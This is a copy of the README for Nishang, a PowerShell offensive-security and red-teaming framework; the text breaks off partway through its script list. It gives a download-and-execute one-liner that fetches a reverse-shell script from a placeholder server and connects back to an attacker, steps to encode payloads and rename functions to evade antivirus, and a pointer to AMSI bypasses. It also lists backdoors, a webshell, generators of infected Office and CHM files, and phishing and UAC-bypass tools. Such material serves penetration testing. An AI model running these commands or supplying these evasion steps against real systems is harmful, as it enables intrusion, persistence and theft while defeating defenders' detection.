Nishang2022最新可用版本，稳定

# Nishang ### Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. By [nikhil_mitt](https://twitter.com/nikhil_mitt) #### Usage Import all the scripts in the current PowerShell session (PowerShell v3 onwards). ```powershell PS C:\nishang> Import-Module .\nishang.psm1 ``` Use the individual scripts with dot sourcing. ```powershell PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1 PS C:\nishang> Get-Information ``` To get help about any script or function, use: ```powershell PS C:\nishang> Get-Help [scriptname] -full ``` Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name. For example, to see the help about Get-WLAN-Keys.ps1, use ```powershell PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1 PS C:\nishang> Get-Help Get-WLAN-Keys -Full ``` #### Anti Virus Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory: Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session. ```powershell powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.] ``` Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`. Encode the scrript using Invoke-Encode from Nishang: ```powershell PS C:\nishang> . \nishang\Utility\Invoke-Encode PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand ``` Encoded data written to .\encoded.txt Encoded command written to .\encodedcommand.txt From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below: ```powershell C:\Users\target> powershell -e [encodedscript] ``` If the scripts still get detected changing the function and parameter names and removing the help content will help. In case Windows 10's AMSI is still blocking script execution, see this blog: http://www.labofapenetrationtester.com/2016/09/amsi.html #### Scripts Nishang currently contains the following scripts and payloads. #### ActiveDirectory [Set-DCShadowPermissions](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) Modify AD objects to provide minimal permissions required for DCShadow. #### Antak - the Webshell [Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell) Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell. #### Backdoors [HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1) A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory. [DNS_TXT_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1) A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries. [Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1) A backdoor which can execute PowerShell scripts at a given time on a target. [Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1) A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it. [Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1) A backdoor which can use Windows screen saver for remote command and script execution. [Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1) A backdoor which can use alternate data streams and Windows Registry to achieve persistence. [Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1) A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U). [Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1) Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user. [Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1) Modify permissions of PowerShell remoting to allow access to a non-admin user. #### Bypass [Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1) Implementation of publicly known methods to bypass/avoid AMSI. #### Client [Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1) Create infected CHM files which can execute PowerShell commands and scripts. [Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1) Create Word files and infect existing ones to run PowerShell commands and scripts. [Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1) Create Excel files and infect existing ones to run PowerShell commands and scripts. [Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1) Create a HTA file which can be deployed on a web server and used in phishing campaigns. [Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1) Create signed JAR files which can be used with applets for script and command execution. [Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1) Create shortcut files capable of executing PowerShell commands and scripts. [Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1) Create IQY files for phishing credentials and SMB hashes. [Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1) Create JS files capable of executing PowerShell commands and scripts. [Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1) Create SCT files capable of executing PowerShell commands and scripts. [Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1) Create a SCF file which can be used for capturing NTLM hash challenges. #### Escalation [Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1) When SYSTEM privileges are required. [Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1) Introduce vulnerabilities by removing patches. [Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1) Bypass UAC. #### Execution [Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1) Download and execute a PowerShell script in memory. [Download_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1) Download an executable in text format, convert it to an executable, and execute. [Execute-Command-MSSQL](https